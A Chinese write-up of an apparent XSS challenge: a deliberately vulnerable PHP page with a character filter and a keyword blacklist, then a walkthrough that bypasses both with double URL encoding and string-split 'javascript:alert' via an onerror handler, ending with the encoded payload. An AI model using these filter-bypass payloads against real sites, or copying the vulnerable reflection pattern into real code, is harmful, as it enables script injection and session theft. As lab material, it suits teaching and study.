网页代码
<?php
header('X-SS-Protection:0');
$xss = isset($_GET['xss'])?$_GET['xss']:'';
$xss = str_replace(array("(",")","&","\\","<",">","'"),'',$xss);
if (preg_match('/(script|document|cookie|eval|setTimeout|alert)/',$xss)){
exit('bad');
}
echo "<img src=\"{$xss}\">"
?>
分析
首先是通过字符替换限制XSS攻击,这一点可以使用URLCode转码的方式进行绕过。
URLCdoe编码格式为“%”加字符ASCII码的十六进制,例如“(”的ASCII码为40,转换为十六进制为28,所以“(”的URLCode编码为%28。
但是仅仅转换一次是不够的,因为地址栏中的URLCode在敲下回车的一瞬间,浏览器就会自动转换,实际传入的还是“(”。解决这个问题很简单,将%也转换为URLCode就行,例如%2528。这样传进php的值就是%28,就不会被过滤掉。执行的时候才会被转换为(。
其次是关键词检测,可以将语句拆分成多个不含敏感词的子串传入,再通过location进行连接。例如:location=“javas”+“cript:a”+lert(1)"
实现
img标签的注入有很多方式,这里我使用onerror。
构造的xss注入代码为
1" onerror=location="javas"+"cript:a"+"lert(1)"
然后进行URLCode转码,得到
1"%20onerror=location="javas"%2B"cript:a"%2B"lert%25281%2529
执行
成功
注入后img标签的内容